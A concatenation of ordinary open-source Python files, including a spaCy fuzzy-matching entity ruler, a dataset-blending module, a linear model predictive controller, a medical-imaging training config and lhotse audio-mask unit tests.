self.token_patterns = defaultdict(list)
self._ent_ids = defaultdict(dict)
def initialize(
self: SpaczzRuler,
get_examples: Callable[[], Iterable[Example]],
*,
nlp: Optional[Language] = None,
patterns: Optional[Iterable[Dict[str, Any]]] = None,
) -> None:
"""Initialize the pipe for training.
Args:
get_examples: Function that returns a representative sample
of gold-standard Example objects.
nlp: The current nlp object the component is part of.
patterns: The list of patterns.
"""
self.clear()
if patterns:
self.add_patterns(patterns)
def match(
self: SpaczzRuler, doc: Doc
) -> Tuple[
List[Tuple[str, int, int]],
DefaultDict[str, Dict[Tuple[str, int, int], Any]],
]:
"""Used in call to find matches in a doc."""
fuzzy_matches = []
lookup: DefaultDict[str, Dict[Tuple[str, int, int], Any]] = defaultdict(dict)
for fuzzy_match in self.fuzzy_matcher(doc):
current_ratio = fuzzy_match[3]
best_ratio = lookup["ratios"].get(fuzzy_match[:3], 0)
if current_ratio > best_ratio:
fuzzy_matches.append(fuzzy_match[:3])
lookup["ratios"][fuzzy_match[:3]] = current_ratio
regex_matches = []
for regex_match in self.regex_matcher(doc):
current_counts = regex_match[3]
best_counts = lookup["counts"].get(regex_match[:3])
if not best_counts or sum(current_counts) < sum(best_counts):
regex_matches.append(regex_match[:3])
lookup["counts"][regex_match[:3]] = current_counts
token_matches = []
for token_match in self.token_matcher(doc):
token_matches.append(token_match[:3])
lookup["details"][token_match[:3]] = 1
matches = fuzzy_matches + regex_matches + token_matches
unique_matches, lookup = self._filter_overlapping_matches(matches, lookup)
return unique_matches, lookup
def score(self: SpaczzRuler, examples: Any, **kwargs: Any) -> Any:
"""Pipeline scoring for spaCy compatibility."""
validate_examples(examples, "SpaczzRuler.score")
return get_ner_prf(examples)
def set_annotations(
self: SpaczzRuler,
doc: Doc,
matches: List[Tuple[str, int, int]],
lookup: DefaultDict[
str, Dict[Tuple[str, int, int], Union[int, Tuple[int, int, int]]]
],
) -> None:
"""Modify the document in place."""
entities = list(doc.ents)
new_entities = []
seen_tokens: Set[int] = set()
for match_id, start, end in matches:
if any(t.ent_type for t in doc[start:end]) and not self.overwrite:
continue
# check for end - 1 here because boundaries are inclusive
if start not in seen_tokens and end - 1 not in seen_tokens:
if match_id in self._ent_ids:
label, ent_id = self._ent_ids[match_id]
span = Span(doc, start, end, label=label)
if ent_id:
for token in span:
token.ent_id_ = ent_id
else:
span = Span(doc, start, end, label=match_id)
span = self._update_custom_attrs(span, match_id, lookup)
new_entities.append(span)
entities = [
e for e in entities if not (e.start < end and e.end > start)
]
seen_tokens.update(range(start, end))
doc.ents = entities + new_entities
def from_bytes(
self: SpaczzRuler,
patterns_bytes: bytes,
*,
exclude: Iterable[str] = simple_frozen_list,
) -> SpaczzRuler:
"""Load the spaczz ruler from a bytestring.
Args:
patterns_bytes : The bytestring to load.
exclude: For spaCy consistency.
Returns:
The loaded spaczz ruler.
Example:
>>> import spacy
>>> from spaczz.pipeline import SpaczzRuler
>>> nlp = spacy.blank("en")
>>> ruler = SpaczzRuler(nlp)
>>> ruler.add_patterns([{"label": "AUTHOR", "pattern": "Kerouac",
"type": "fuzzy"}])
>>> ruler_bytes = ruler.to_bytes()
>>> new_ruler = SpaczzRuler(nlp)
>>> new_ruler = new_ruler.from_bytes(ruler_bytes)
>>> "AUTHOR" in new_ruler
True
"""
cfg = srsly.msgpack_loads(patterns_bytes)
self.clear()
if isinstance(cfg, dict):
self.add_patterns(cfg.get("patterns", cfg))
self.defaults = cfg.get("defaults", {})
if self.defaults.get("fuzzy_defaults"):
self.fuzzy_matcher = FuzzyMatcher(
self.nlp.vocab, **self.defaults["fuzzy_defaults"]
)
if self.defaults.get("regex_defaults"):
self.regex_matcher = RegexMatcher(
self.nlp.vocab, **self.defaults["regex_defaults"]
)
if self.defaults.get("token_defaults"):
self.token_matcher = TokenMatcher(
self.nlp.vocab, **self.defaults["token_defaults"]
)
self.overwrite = cfg.get("overwrite", False)
self.ent_id_sep = cfg.get("ent_id_sep", DEFAULT_ENT_ID_SEP)
else:
self.add_patterns(cfg)
return self
def to_bytes(
self: SpaczzRuler, *, exclude: Iterable[str] = simple_frozen_list
) -> bytes:
"""Serialize the spaczz ruler patterns to a bytestring.
Args:
exclude: For spaCy consistency.
Returns:
The serialized patterns.
Example:
>>> import spacy
>>> from spaczz.pipeline import SpaczzRuler
>>> nlp = spacy.blank("en")
>>> ruler = SpaczzRuler(nlp)
>>> ruler.add_patterns([{"label": "AUTHOR", "pattern": "Kerouac",
"type": "fuzzy"}])
>>> ruler_bytes = ruler.to_bytes()
>>> isinstance(ruler_bytes, bytes)
True
"""
serial = {
"overwrite": self.overwrite,
"ent_id_sep": self.ent_id_sep,
"patterns": self.patterns,
"defaults": self.defaults,
}
return srsly.msgpack_dumps(serial)
def from_disk(
self: SpaczzRuler,
path: Union[str, Path],
*,
exclude: Iterable[str] = simple_frozen_list,
) -> SpaczzRuler:
"""Load the spaczz ruler from a file.
Expects a file containing newline-delimited JSON (JSONL)
with one entry per line.
Args:
path: The JSONL file to load.
exclude: For spaCy consistency.
Returns:
The loaded spaczz ruler.
Example:
>>> import os
>>> import tempfile
>>> import spacy
>>> from spaczz.pipeline import SpaczzRuler
>>> nlp = spacy.blank("en")
>>> ruler = SpaczzRuler(nlp)
>>> ruler.add_patterns([{"label": "AUTHOR", "pattern": "Kerouac",
"type": "fuzzy"}])
>>> with tempfile.TemporaryDirectory() as tmpdir:
>>> ruler.to_disk(f"{tmpdir}/ruler")
>>> new_ruler = SpaczzRuler(nlp)
>>> new_ruler = new_ruler.from_disk(f"{tmpdir}/ruler")
>>> "AUTHOR" in new_ruler
True
"""
path = ensure_path(path)
self.clear()
depr_patterns_path = path.with_suffix(".jsonl")
if depr_patterns_path.is_file():
patterns = srsly.read_jsonl(depr_patterns_path)
self.add_patterns(patterns)
else:
cfg = {}
deserializers_patterns = {
"patterns": lambda p: self.add_patterns(
srsly.read_jsonl(p.with_suffix(".jsonl"))
)
}
deserializers_cfg = {"cfg": lambda p: cfg.update(srsly.read_json(p))}
read_from_disk(path, deserializers_cfg, {})
self.overwrite = cfg.get("overwrite", False)
self.defaults = cfg.get("defaults", {})
if self.defaults.get("fuzzy_defaults"):
self.fuzzy_matcher = FuzzyMatcher(
self.nlp.vocab, **self.defaults["fuzzy_defaults"]
)
if self.defaults.get("regex_defaults"):
self.regex_matcher = RegexMatcher(
self.nlp.vocab, **self.defaults["regex_defaults"]
)
if self.defaults.get("token_defaults"):
self.token_matcher = TokenMatcher(
self.nlp.vocab, **self.defaults["token_defaults"]
)
self.ent_id_sep = cfg.get("ent_id_sep", DEFAULT_ENT_ID_SEP)
read_from_disk(path, deserializers_patterns, {})
return self
def to_disk(
self: SpaczzRuler,
path: Union[str, Path],
*,
exclude: Iterable[str] = simple_frozen_list,
) -> None:
"""Save the spaczz ruler patterns to a directory.
The patterns will be saved as newline-delimited JSON (JSONL).
Args:
path: The JSONL file to save.
exclude: For spaCy consistency.
Example:
>>> import os
>>> import tempfile
>>> import spacy
>>> from spaczz.pipeline import SpaczzRuler
>>> nlp = spacy.blank("en")
>>> ruler = SpaczzRuler(nlp)
>>> ruler.add_patterns([{"label": "AUTHOR", "pattern": "Kerouac",
"type": "fuzzy"}])
>>> with tempfile.TemporaryDirectory() as tmpdir:
>>> ruler.to_disk(f"{tmpdir}/ruler")
>>> isdir = os.path.isdir(f"{tmpdir}/ruler")
>>> isdir
True
"""
path = ensure_path(path)
cfg = {
"overwrite": self.overwrite,
"defaults": self.defaults,
"ent_id_sep": self.ent_id_sep,
}
serializers = {
"patterns": lambda p: srsly.write_jsonl(
p.with_suffix(".jsonl"), self.patterns
),
"cfg": lambda p: srsly.write_json(p, cfg),
}
if path.suffix == ".jsonl": # user wants to save only JSONL
srsly.write_jsonl(path, self.patterns)
else:
write_to_disk(path, serializers, {})
def _add_patterns(
self: SpaczzRuler,
fuzzy_patterns: List[Dict[str, Any]],
regex_patterns: List[Dict[str, Any]],
token_patterns: List[Dict[str, Any]],
) -> None:
"""Helper function for add_patterns."""
for entry in fuzzy_patterns + regex_patterns + token_patterns:
label = entry["label"]
if "id" in entry:
ent_label = label
label = self._create_label(label, entry["id"])
self._ent_ids[label] = (ent_label, entry["id"])
pattern = entry["pattern"]
if isinstance(pattern, Doc):
self.fuzzy_patterns[label]["patterns"].append(pattern)
self.fuzzy_patterns[label]["kwargs"].append(entry["kwargs"])
elif isinstance(pattern, str):
self.regex_patterns[label]["patterns"].append(pattern)
self.regex_patterns[label]["kwargs"].append(entry["kwargs"])
elif isinstance(pattern, list):
self.token_patterns[label].append(pattern)
else:
raise ValueError(
(
"One or more patterns do not conform",
"to spaczz pattern structure:",
"{label (str), pattern (str or list), type (str),",
"optional kwargs (dict[str, Any]),",
"and optional id (str)}.",
)
)
for label, patterns in self.fuzzy_patterns.items():
self.fuzzy_matcher.add(label, patterns["patterns"], patterns["kwargs"])
for label, patterns in self.regex_patterns.items():
self.regex_matcher.add(label, patterns["patterns"], patterns["kwargs"])
for label, _token_patterns in self.token_patterns.items():
self.token_matcher.add(label, _token_patterns)
def _create_label(self: SpaczzRuler, label: str, ent_id: Union[str, None]) -> str:
"""Join Entity label with ent_id if the pattern has an id attribute.
Args:
label: The entity label.
ent_id: The optional entity id.
Returns:
The label and ent_id joined with configured ent_id_sep.
"""
if isinstance(ent_id, str):
label = "{}{}{}".format(label, self.ent_id_sep, ent_id)
return label
def _split_label(self: SpaczzRuler, label: str) -> Tuple[str, Union[str, None]]:
"""Split Entity label into ent_label and ent_id if it contains self.ent_id_sep.
Args:
label: The value of label in a pattern entry
Returns:
The separated ent_label and optional ent_id.
"""
if self.ent_id_sep in label:
ent_label, ent_id = label.rsplit(self.ent_id_sep, 1)
return ent_label, ent_id
else:
ent_label = label
return ent_label, None
@staticmethod
def _filter_overlapping_matches(
matches: List[Tuple[str, int, int]],
lookup: DefaultDict[str, Dict[Tuple[str, int, int], Any]],
) -> Tuple[
List[Tuple[str, int, int]], DefaultDict[str, Dict[Tuple[str, int, int], Any]]
]:
"""Prevents multiple match spans from overlapping.
Expects matches to be pre-sorted by matcher priority,
with each matcher's matches being pre-sorted by descending length,
        then ascending start index, then descending match score.
If more than one match span includes the same tokens
the first of these match spans in matches is kept.
        Duplicate lookup entries for kept spans are also removed, keeping
        only the highest-priority match type.
Args:
matches: List of match span tuples
(match_id, start_index, end_index).
lookup: Match ratio, count and detail values in
a `defaultdict(dict)`.
Returns:
The filtered list of match span tuples.
"""
filtered_matches: List[Tuple[str, int, int]] = []
for match in matches:
if not set(range(match[1], match[2])).intersection(
chain(*[set(range(n[1], n[2])) for n in filtered_matches])
):
filtered_matches.append(match)
if match in lookup["ratios"]:
_ = lookup["counts"].pop(match, None)
_ = lookup["details"].pop(match, None)
elif match in lookup["counts"]:
_ = lookup["details"].pop(match, None)
return filtered_matches, lookup
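    # Worked example (added comment): given matches [("A", 0, 3), ("B", 1, 2),
    # ("C", 3, 5)] in priority order, ("B", 1, 2) overlaps the token range of
    # ("A", 0, 3) and is dropped, leaving [("A", 0, 3), ("C", 3, 5)]. For each
    # kept span, lower-priority lookup entries (counts/details) for the same
    # key are popped so only the highest-priority match type remains.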
@staticmethod
def _update_custom_attrs(
span: Span,
match_id: str,
lookup: DefaultDict[str, Dict[Tuple[str, int, int], Any]],
) -> Span:
"""Update custom attributes for matches."""
ratio = lookup["ratios"].get((match_id, span.start, span.end))
counts = lookup["counts"].get((match_id, span.start, span.end))
details = lookup["details"].get((match_id, span.start, span.end))
for token in span:
token._.spaczz_token = True
if ratio:
token._.spaczz_ratio = ratio
token._.spaczz_type = "fuzzy"
elif counts:
token._.spaczz_counts = counts
token._.spaczz_type = "regex"
elif details:
token._.spaczz_details = details
token._.spaczz_type = "token"
return span
|
test/itest_close.py | tnakagawa/lit | 560 | 12652922 | <reponame>tnakagawa/lit
import testlib
import test_combinators
def forward(env):
lit1 = env.lits[0]
lit2 = env.lits[1]
test_combinators.run_close_test(env, lit1, lit2, lit1)
def reverse(env):
lit1 = env.lits[0]
lit2 = env.lits[1]
    test_combinators.run_close_test(env, lit1, lit2, lit2)
|
examples/research_projects/movement-pruning/emmental/modules/__init__.py | liminghao1630/transformers | 50,404 | 12652923 | <gh_stars>1000+
# flake8: noqa
from .binarizer import MagnitudeBinarizer, ThresholdBinarizer, TopKBinarizer
from .masked_nn import MaskedLinear
|
fireant/dataset/data_blending.py | mikeengland/fireant | 122 | 12652928 | <gh_stars>100-1000
from fireant.dataset.fields import Field
from fireant.dataset.klass import DataSet
from fireant.queries.builder import (
DataSetBlenderQueryBuilder,
DimensionChoicesQueryBuilder,
)
from fireant.utils import (
deepcopy,
immutable,
ordered_distinct_list_by_attr,
)
def _wrap_dataset_fields(dataset):
if isinstance(dataset, DataSetBlender):
return dataset.fields
wrapped_fields = []
for field in dataset.fields:
wrapped_field = _wrap_field(dataset, field)
wrapped_fields.append(wrapped_field)
return wrapped_fields
def _wrap_field(dataset, field):
wrapped_field = Field(
alias=field.alias,
definition=field,
data_type=field.data_type,
label=field.label,
hint_table=field.hint_table,
prefix=field.prefix,
suffix=field.suffix,
thousands=field.thousands,
precision=field.precision,
hyperlink_template=field.hyperlink_template,
)
if not field.definition.is_aggregate:
wrapped_field.choices = DimensionChoicesBlenderQueryBuilder(dataset, field)
return wrapped_field
class DataSetBlender:
"""
The DataSetBlender class is the DataSet equivalent for implementing data blending, across distinct DataSet
instances.
"""
def __init__(self, primary_dataset, secondary_dataset, dimension_map):
"""
Constructor for a blended dataset. Contains all the fields to initialize the dataset.
:param primary_dataset: (Required)
The primary dataset, which table will be used as part of the FROM expression. This can be either a `DataSet`
or another `DataSetBlender`, which means multiple DataSet instances can be blended by chaining together
blenders.
:param secondary_dataset: (Required)
The dataset being blended. This should be a `DataSet` instance. (It might actually work with an instance of
`DataSetBlender` as well, though.)
:param dimension_map:
A dict mapping up fields from the primary to the secondary dataset. This tells the Blender which fields
can be used as dimensions in the Blender queries.
"""
self.primary_dataset = primary_dataset
self.secondary_dataset = secondary_dataset
self.dimension_map = dimension_map
# Wrap all dataset fields with another field on top so that:
# 1. DataSetBlender doesn't share a reference to a field with a DataSet (__hash__ is used to find out which
# dataset the field is in - see the Field class' __hash__ method for more details)
# 2. When complex fields are added, the `definition` attribute will always have at least one field within
# its object graph
self.fields = DataSet.Fields(
ordered_distinct_list_by_attr(
[*_wrap_dataset_fields(primary_dataset), *_wrap_dataset_fields(secondary_dataset)],
)
)
# add query builder entry points
self.query = DataSetBlenderQueryBuilder(self)
self.latest = self.primary_dataset.latest
self.annotation = None
@property
def return_additional_metadata(self) -> bool:
# When using data blending, datasets are nested inside DataSetBlender objects. Additionally,
# the primary_dataset can be a combination of datasets depending on how many datasets are being blended.
# This helper property walks the tree to return the return_additional_metadata value from the original
# primary dataset.
dataset = self.primary_dataset
while not isinstance(dataset, DataSet):
dataset = dataset.primary_dataset
return dataset.return_additional_metadata
def __eq__(self, other):
return isinstance(other, DataSetBlender) and self.fields == other.fields
def __repr__(self):
return "BlendedDataSet(fields=[{}])".format(",".join([repr(f) for f in self.fields]))
def __hash__(self):
return hash((self.primary_dataset, self.secondary_dataset, self.fields))
def __deepcopy__(self, memodict={}):
for field in self.dimension_map.values():
memodict[id(field)] = field
return deepcopy(self, memodict)
@property
def table(self):
return None
@property
def database(self):
return self.primary_dataset.database
@immutable
def extra_fields(self, *fields):
for field in fields:
self.fields.add(field)
def blend(self, other):
"""
Returns a Data Set blender which enables to execute queries on multiple data sets and combine them.
"""
return DataSetBlenderBuilder(self, other)
class DataSetBlenderBuilder:
def __init__(self, primary, secondary):
self.primary_dataset = primary
self.secondary_dataset = secondary
def on(self, dimension_map):
return DataSetBlender(self.primary_dataset, self.secondary_dataset, dimension_map)
def on_dimensions(self):
"""
This function doesn't work when blending more than 2 datasets. It won't select dimensions in the 3rd dataset
and further. self.primary_dataset might be a DataSetBlender object itself. We would want to dig deeper until
we find the actual primary dataset.
"""
dimension_map = {}
for secondary_ds_field in self.secondary_dataset.fields:
is_aggregate_field = secondary_ds_field.is_aggregate
matches_alias_in_primary_dataset = secondary_ds_field.alias in self.primary_dataset.fields
if is_aggregate_field or not matches_alias_in_primary_dataset:
continue
primary_ds_field = self.primary_dataset.fields[secondary_ds_field.alias]
dimension_map[primary_ds_field] = secondary_ds_field
return self.on(dimension_map)
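# --- Illustrative sketch (not part of the original module) ---
# Blending two datasets with the builder defined above. `sales` and `costs`
# are assumed to be existing DataSet instances that both expose a "date"
# dimension; field lookup by alias mirrors how on_dimensions() resolves them.
def _example_blend(sales, costs):  # pragma: no cover
    blender = DataSetBlenderBuilder(sales, costs)
    blended = blender.on({sales.fields["date"]: costs.fields["date"]})
    # Or, to map every shared non-aggregate field automatically:
    blended_auto = blender.on_dimensions()
    return blended, blended_auto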
class DimensionChoicesBlenderQueryBuilder(DimensionChoicesQueryBuilder):
def filter(self, *filters, **kwargs):
filters = [fltr.for_(fltr.field.definition) for fltr in filters if fltr.field.definition in self.dataset.fields]
return super().filter(*filters, **kwargs)
|
PythonLinearNonlinearControl/controllers/mpc.py | Geonhee-LEE/PythonLinearNonlinearControl | 425 | 12652946 | <reponame>Geonhee-LEE/PythonLinearNonlinearControl
from logging import getLogger
import numpy as np
from scipy.optimize import minimize
from scipy.optimize import LinearConstraint
from .controller import Controller
from ..envs.cost import calc_cost
logger = getLogger(__name__)
class LinearMPC(Controller):
""" Model Predictive Controller for linear model
Attributes:
A (numpy.ndarray): system matrix, shape(state_size, state_size)
B (numpy.ndarray): input matrix, shape(state_size, input_size)
Q (numpy.ndarray): cost function weight for states
        R (numpy.ndarray): cost function weight for inputs
history_us (list[numpy.ndarray]): time history of optimal input
Ref:
<NAME>. (2002). Predictive control: with constraints.
"""
def __init__(self, config, model):
"""
Args:
            config (ConfigModule): configuration parameters for the controller
            model (Model): linear system model providing the A and B matrices
"""
if config.TYPE != "Linear":
raise ValueError("{} could be not applied to \
this controller".format(model))
super(LinearMPC, self).__init__(config, model)
# system parameters
self.model = model
self.A = model.A
self.B = model.B
self.state_size = config.STATE_SIZE
self.input_size = config.INPUT_SIZE
self.pred_len = config.PRED_LEN
# get cost func
self.state_cost_fn = config.state_cost_fn
self.terminal_state_cost_fn = config.terminal_state_cost_fn
self.input_cost_fn = config.input_cost_fn
# cost parameters
self.Q = config.Q
self.R = config.R
self.Qs = None
self.Rs = None
# constraints
self.dt_input_lower_bound = config.DT_INPUT_LOWER_BOUND
self.dt_input_upper_bound = config.DT_INPUT_UPPER_BOUND
self.input_lower_bound = config.INPUT_LOWER_BOUND
self.input_upper_bound = config.INPUT_UPPER_BOUND
# setup controllers
self.W = None
self.omega = None
self.F = None
self.f = None
self.setup()
self.prev_sol = np.zeros(self.input_size*self.pred_len)
# history
self.history_u = [np.zeros(self.input_size)]
def setup(self):
"""
setup Model Predictive Control as a quadratic programming
"""
A_factorials = [self.A]
self.phi_mat = self.A.copy()
for _ in range(self.pred_len - 1):
temp_mat = np.matmul(A_factorials[-1], self.A)
self.phi_mat = np.vstack((self.phi_mat, temp_mat))
A_factorials.append(temp_mat)  # these powers of A are reused below
self.gamma_mat = self.B.copy()
gammma_mat_temp = self.B.copy()
for i in range(self.pred_len - 1):
temp_1_mat = np.matmul(A_factorials[i], self.B)
gammma_mat_temp = temp_1_mat + gammma_mat_temp
self.gamma_mat = np.vstack((self.gamma_mat, gammma_mat_temp))
self.theta_mat = self.gamma_mat.copy()
for i in range(self.pred_len - 1):
temp_mat = np.zeros_like(self.gamma_mat)
temp_mat[int((i + 1)*self.state_size):, :] =\
self.gamma_mat[:-int((i + 1)*self.state_size), :]
self.theta_mat = np.hstack((self.theta_mat, temp_mat))
# evaluation function weight
diag_Qs = np.tile(np.diag(self.Q), self.pred_len)
diag_Rs = np.tile(np.diag(self.R), self.pred_len)
self.Qs = np.diag(diag_Qs)
self.Rs = np.diag(diag_Rs)
# constraints
# about inputs
if self.input_lower_bound is not None:
self.F = np.zeros((self.input_size * 2,
self.pred_len * self.input_size))
for i in range(self.input_size):
self.F[i * 2: (i + 1) * 2, i] = np.array([1., -1.])
temp_F = self.F.copy()
for i in range(self.pred_len - 1):
for j in range(self.input_size):
temp_F[j * 2: (j + 1) * 2,
((i+1) * self.input_size) + j] = np.array([1., -1.])
self.F = np.vstack((self.F, temp_F))
self.F1 = self.F[:, :self.input_size]
temp_f = []
for i in range(self.input_size):
temp_f.append(-1 * self.input_upper_bound[i])
temp_f.append(self.input_lower_bound[i])
self.f = np.tile(np.array(temp_f).flatten(), self.pred_len)
# about dt_input constraints
if self.dt_input_lower_bound is not None:
self.W = np.zeros((2, self.pred_len * self.input_size))
self.W[:, 0] = np.array([1., -1.])
for i in range(self.pred_len * self.input_size - 1):
temp_W = np.zeros((2, self.pred_len * self.input_size))
temp_W[:, i+1] = np.array([1., -1.])
self.W = np.vstack((self.W, temp_W))
temp_omega = []
for i in range(self.input_size):
temp_omega.append(self.dt_input_upper_bound[i])
temp_omega.append(-1. * self.dt_input_lower_bound[i])
self.omega = np.tile(np.array(temp_omega).flatten(),
self.pred_len)
def obtain_sol(self, curr_x, g_xs):
""" calculate the optimal inputs
Args:
curr_x (numpy.ndarray): current state, shape(state_size, )
g_xs (numpy.ndarray): goal trajectory,
shape(plan_len+1, state_size)
Returns:
opt_input (numpy.ndarray): optimal input, shape(input_size, )
"""
temp_1 = np.matmul(self.phi_mat, curr_x.reshape(-1, 1))
temp_2 = np.matmul(self.gamma_mat, self.history_u[-1].reshape(-1, 1))
error = g_xs[1:].reshape(-1, 1) - temp_1 - temp_2
G = np.matmul(self.theta_mat.T, np.matmul(self.Qs, error))
H = np.matmul(self.theta_mat.T, np.matmul(self.Qs, self.theta_mat)) \
+ self.Rs
H = H * 0.5
# constraints
A = []
b = []
if self.W is not None:
A.append(self.W)
b.append(self.omega.reshape(-1, 1))
if self.F is not None:
b_F = - np.matmul(self.F1, self.history_u[-1].reshape(-1, 1)) \
- self.f.reshape(-1, 1)
A.append(self.F)
b.append(b_F)
A = np.array(A).reshape(-1, self.input_size * self.pred_len)
ub = np.array(b).flatten()
# objective for scipy.optimize.minimize (a cvxopt variant is sketched below)
def optimized_func(dt_us):
return (np.dot(dt_us, np.dot(H, dt_us.reshape(-1, 1)))
- np.dot(G.T, dt_us.reshape(-1, 1)))[0]
# constraint
lb = np.array([-np.inf for _ in range(len(ub))])  # one-sided constraints
cons = LinearConstraint(A, lb, ub)
# solve
opt_sol = minimize(optimized_func, self.prev_sol.flatten(),
constraints=[cons])
opt_dt_us = opt_sol.x
""" using cvxopt ver,
if you want to solve more quick please use cvxopt instead of scipy
# make cvxpy problem formulation
P = 2*matrix(H)
q = matrix(-1 * G)
A = matrix(A)
b = matrix(ub)
# solve the problem
opt_sol = solvers.qp(P, q, G=A, h=b)
opt_dt_us = np.array(list(opt_sol['x']))
"""
# accumulate the input increments over the horizon
opt_dt_u_seq = np.cumsum(opt_dt_us.reshape(self.pred_len,
self.input_size),
axis=0)
self.prev_sol = opt_dt_u_seq.copy()
opt_u_seq = opt_dt_u_seq + self.history_u[-1]
# save
self.history_u.append(opt_u_seq[0])
# check costs
costs = self.calc_cost(curr_x,
opt_u_seq.reshape(1,
self.pred_len,
self.input_size),
g_xs)
logger.debug("Cost = {}".format(costs))
return opt_u_seq[0]
def __str__(self):
return "LinearMPC"
|
exercises/ja/test_01_02_01.py | Jette16/spacy-course | 2,085 | 12652971 | def test():
import spacy.tokens
import spacy.lang.en
assert isinstance(
nlp, spacy.lang.en.English
), "nlpオブジェクトはEnglishクラスのインスタンスでなければなりません"
assert isinstance(doc, spacy.tokens.Doc), "テキストをnlpオブジェクトで処理してdocを作成しましたか?"
assert "print(doc.text)" in __solution__, "doc.textをプリントしましたか?"
__msg__.good("正解です!")
|
kaggle/RANZCR/4th_place_solution/configs/default_config.py | tommydino93/tutorials | 535 | 12652983 | import os
from types import SimpleNamespace
cfg = SimpleNamespace(**{})
# data path
cfg.data_dir = "/workspace/data/ranzcr/"
cfg.data_folder = cfg.data_dir + "train/"
cfg.train_df = cfg.data_dir + "train_folds.csv"
cfg.test_df = cfg.data_dir + "sample_submission.csv"
cfg.output_dir = "./output/weights/"
# dataset
cfg.batch_size = 4
cfg.img_size = (896, 896)
cfg.train_aug = None
cfg.val_aug = None
cfg.label_cols = [
"ETT - Abnormal",
"ETT - Borderline",
"ETT - Normal",
"NGT - Abnormal",
"NGT - Borderline",
"NGT - Incompletely Imaged",
"NGT - Normal",
"CVC - Abnormal",
"CVC - Borderline",
"CVC - Normal",
"Swan Ganz Catheter Present",
]
cfg.num_classes = len(cfg.label_cols)
# mask
cfg.thickness = 32
cfg.seg_weight = 50
# model
cfg.backbone = "tf_efficientnet_b8_ap"
cfg.pretrained = True
cfg.pretrained_weights = None
cfg.train = True
cfg.seg_dim = 3
cfg.image_extension = ".jpg"
# training
cfg.fold = -1
cfg.lr = 1e-4
cfg.weight_decay = 0
cfg.epochs = 15
cfg.seed = -1
cfg.calc_loss = True
cfg.train_val = False
cfg.eval_epochs = 1
cfg.eval_train_epochs = 20
cfg.warmup = 5
cfg.compute_auc = True
# ressources
cfg.find_unused_parameters = True
cfg.mixed_precision = True
cfg.grad_accumulation = 1
cfg.gpu = 0
cfg.device = "cuda:%d" % cfg.gpu
cfg.num_workers = 8
cfg.drop_last = True
basic_cfg = cfg
|
test/cut/test_masks.py | stachu86/lhotse | 353 | 12652994 | <filename>test/cut/test_masks.py<gh_stars>100-1000
from itertools import chain
from unittest.mock import Mock
import numpy as np
import pytest
from lhotse import MonoCut, SupervisionSegment
from lhotse.cut import PaddingCut
from lhotse.supervision import AlignmentItem
from lhotse.utils import LOG_EPSILON
class TestMasksWithoutSupervisions:
def test_cut_audio_mask(self):
cut = MonoCut(
"cut", start=0, duration=2, channel=0, recording=Mock(sampling_rate=16000)
)
mask = cut.supervisions_audio_mask()
assert mask.sum() == 0
def test_cut_features_mask(self):
cut = MonoCut(
"cut",
start=0,
duration=2,
channel=0,
features=Mock(sampling_rate=16000, frame_shift=0.01, num_frames=2000),
)
mask = cut.supervisions_feature_mask()
assert mask.sum() == 0
def test_padding_cut_audio_mask(self):
cut = PaddingCut(
"cut",
duration=2,
sampling_rate=16000,
feat_value=LOG_EPSILON,
num_samples=32000,
)
mask = cut.supervisions_audio_mask()
assert mask.sum() == 0
def test_padding_cut_features_mask(self):
cut = PaddingCut(
"cut",
duration=2,
sampling_rate=16000,
feat_value=LOG_EPSILON,
num_frames=2000,
num_features=13,
)
mask = cut.supervisions_feature_mask()
assert mask.sum() == 0
def test_mixed_cut_audio_mask(self):
cut = MonoCut(
"cut", start=0, duration=2, channel=0, recording=Mock(sampling_rate=16000)
)
mixed_cut = cut.append(cut)
mask = mixed_cut.supervisions_audio_mask()
assert mask.sum() == 0
def test_mixed_cut_features_mask(self):
cut = MonoCut(
"cut",
start=0,
duration=2,
channel=0,
features=Mock(sampling_rate=16000, frame_shift=0.01),
)
mixed_cut = cut.append(cut)
mask = mixed_cut.supervisions_feature_mask()
assert mask.sum() == 0
@pytest.fixture
def supervisions():
return [
SupervisionSegment(
"sup",
"rec",
start=0,
duration=0.5,
speaker="SpkA",
alignment={
"word": [
AlignmentItem(symbol="a", start=0, duration=0.1),
AlignmentItem(symbol="b", start=0.2, duration=0.2),
]
},
),
SupervisionSegment(
"sup",
"rec",
start=0.6,
duration=0.2,
speaker="SpkB",
alignment={
"word": [
AlignmentItem(symbol="a", start=0.6, duration=0.2),
]
},
),
]
class TestMasksWithSupervisions:
@pytest.mark.parametrize("alignment", [None, "word"])
def test_cut_audio_mask(self, supervisions, alignment):
cut = MonoCut(
"cut",
start=0,
duration=2,
channel=0,
recording=Mock(sampling_rate=16000),
supervisions=supervisions,
)
mask = cut.supervisions_audio_mask(use_alignment_if_exists=alignment)
if alignment == "word":
ones = np.index_exp[
list(chain(range(0, 1600), range(3200, 6400), range(9600, 12800)))
]
zeros = np.index_exp[
list(chain(range(1600, 3200), range(6400, 9600), range(12800, 32000)))
]
else:
ones = np.index_exp[list(chain(range(0, 8000), range(9600, 12800)))]
zeros = np.index_exp[list(chain(range(8000, 9600), range(12800, 32000)))]
assert (mask[ones] == 1).all()
assert (mask[zeros] == 0).all()
@pytest.mark.parametrize("alignment", [None, "word"])
def test_cut_features_mask(self, supervisions, alignment):
cut = MonoCut(
"cut",
start=0,
duration=2,
channel=0,
features=Mock(sampling_rate=16000, frame_shift=0.01, num_frames=2000),
supervisions=supervisions,
)
mask = cut.supervisions_feature_mask(use_alignment_if_exists=alignment)
if alignment == "word":
ones = np.index_exp[list(chain(range(0, 10), range(20, 40), range(60, 80)))]
zeros = np.index_exp[
list(chain(range(10, 20), range(40, 60), range(80, 200)))
]
else:
ones = np.index_exp[list(chain(range(0, 50), range(60, 80)))]
zeros = np.index_exp[list(chain(range(50, 60), range(80, 200)))]
assert (mask[ones] == 1).all()
assert (mask[zeros] == 0).all()
@pytest.mark.parametrize("alignment", [None, "word"])
def test_cut_speakers_audio_mask(self, supervisions, alignment):
cut = MonoCut(
"cut",
start=0,
duration=2,
channel=0,
recording=Mock(sampling_rate=16000),
supervisions=supervisions,
)
mask = cut.speakers_audio_mask(use_alignment_if_exists=alignment)
if alignment == "word":
ones = [
np.index_exp[list(chain(range(0, 1600), range(3200, 6400)))],
np.index_exp[list(chain(range(9600, 12800)))],
]
zeros = [
np.index_exp[list(chain(range(1600, 3200), range(6400, 32000)))],
np.index_exp[list(chain(range(0, 9600), range(12800, 32000)))],
]
else:
ones = [np.index_exp[range(0, 8000)], np.index_exp[range(9600, 12800)]]
zeros = [
np.index_exp[list(chain(range(8000, 32000)))],
np.index_exp[list(chain(range(0, 9600), range(12800, 32000)))],
]
